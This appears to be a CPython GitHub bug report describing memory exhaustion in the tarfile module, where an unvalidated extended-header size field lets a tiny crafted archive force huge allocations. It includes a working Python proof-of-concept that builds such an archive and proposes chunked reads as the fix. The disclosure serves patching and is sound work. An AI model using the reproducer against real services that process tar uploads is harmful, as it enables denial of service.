tarfile: memory exhaustion via oversized extended-header (GNU long name / pax) size field

# Bug report

### Bug description

`tarfile` reads a member's *extended header* — a GNU long name/link (`GNUTYPE_LONGNAME` / `GNUTYPE_LONGLINK`) or a pax header (`XHDTYPE` / `XGLTYPE`) — with a single read sized directly by the header's `size` field:

https://github.com/python/cpython/blob/main/Lib/tarfile.py#L1427
https://github.com/python/cpython/blob/main/Lib/tarfile.py#L1483

```python
buf = tarfile.fileobj.read(self._block(self.size))
```

`self.size` comes from the 12-byte size field of the extended-header member and is **not validated** against the data actually present. Via base-256 encoding it can claim up to ~2**88 bytes. A ~512-byte crafted archive therefore makes `read()` pre-allocate gigabytes — and this happens on **open / iterate** (`tarfile.open(...).getmembers()`), *before* any extraction filter runs.

### Reproducer

```python
import os, resource, tarfile, tempfile

# A 512-byte tar whose single member is a GNU long-name header claiming ~1 GiB.
ti = tarfile.TarInfo("A")
ti.type = tarfile.GNUTYPE_LONGNAME
ti.size = 1_000_000_000          # claimed size; only the 512-byte header follows
data = ti.tobuf(format=tarfile.GNU_FORMAT)   # exactly 512 bytes

with tempfile.NamedTemporaryFile(suffix=".tar", delete=False) as f:
    f.write(data)
    path = f.name

before = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
try:
    with tarfile.open(path, "r:") as t:
        t.getmembers()
except Exception as e:
    print(type(e).__name__, e)
after = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
print(f"peak RSS delta: {(after - before) / 1024:.0f} MiB from a {os.path.getsize(path)}-byte file")
os.unlink(path)
```

On current `main` this prints a peak RSS delta of ~950 MiB from a 512-byte file. The same applies to `GNUTYPE_LONGLINK` and to pax headers (`XHDTYPE`). Because the size field accepts base-256 encoding, a 512-byte file can claim, e.g., 1 TiB, raising `MemoryError` even on machines with plenty of RAM. The crafted header round-trips through `TarInfo.frombuf`, so it parses exactly like a normal archive.

### Suggested fix

Read the extended-header bytes in bounded chunks instead of one `read(size)`, so the claimed size can't force a huge up-front allocation. The returned bytes are unchanged for valid archives. I have a patch + regression tests ready and will open a PR.

### CPython versions tested on

CPython main (also reproduces on the released branches).

### Operating systems tested on

Linux


### Linked PRs
* gh-151498

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

tarfile: memory exhaustion via oversized extended-header (GNU long name / pax) size field #151497

Bug report

Bug description

Reproducer

Suggested fix

CPython versions tested on

Operating systems tested on

Linked PRs

Metadata

Assignees

Labels

Fields

Projects

Milestone

Relationships

Development

Uh oh!

tarfile: memory exhaustion via oversized extended-header (GNU long name / pax) size field #151497

Description

Bug report

Bug description

Reproducer

Suggested fix

CPython versions tested on

Operating systems tested on

Linked PRs

Metadata

Metadata

Assignees

Labels

Fields

Projects

Milestone

Relationships

Development

Issue actions